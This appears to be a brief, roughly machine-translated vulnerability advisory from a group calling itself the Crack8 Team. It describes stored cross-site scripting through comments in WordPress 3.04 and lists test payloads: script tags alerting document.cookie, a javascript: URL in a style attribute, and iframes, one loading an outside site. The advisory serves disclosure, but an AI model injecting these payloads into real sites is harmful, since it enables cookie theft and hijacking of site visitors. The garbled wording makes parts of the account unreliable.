WordPress 3.04XSS Cross-Site vulnerability and repair

Information submission: QQ kiss (crack8_at_qq.com)
Affected Versions: 3.04

The previous version is not tested. Theoretically, the vulnerability is described as follows:

Author: QQ kiss Team: Crack8 Team

Blog http://hi.baidu.com/qhack8

The following prompt indicates that you can submit a comment in HTML code.
Just conduct a habitual test to see if it can be X.
Then, test the XSS statement in the K8 all-around hacker notepad and find that

Log in as an administrator and submit the following statement for comments

During the test, it is found that comments are made by common users, even if the administrator passes

The submitted XSS code will also be cleared by WP (this is the case for a few tests)

From the WP database, the submitted login with the USER permission is cleared.

Other statements have not been tested. The following code contains Trojans, cookies, etc.

The HTML code is very simple. I will not explain the so-called XSS.

Test method:

> <Script> alert (document. cookie) </script>

=> <Script> alert (document. cookie) </script>

<Script> alert (document. cookie) </script>

<Script> alert (Crack8_Team) </script>

<Div style = "background-image: url (javascript: alert (Crack8_Team)">

<Iframe src = javascript: alert (Crack8_Team)> </IFRAME>

<Iframe src = http://hi.baidu.com/hkqqkiss> </IFRAME>

Finally, I wish you a good year without any technical skills.
Security suggestions:
Background settings filter submitted code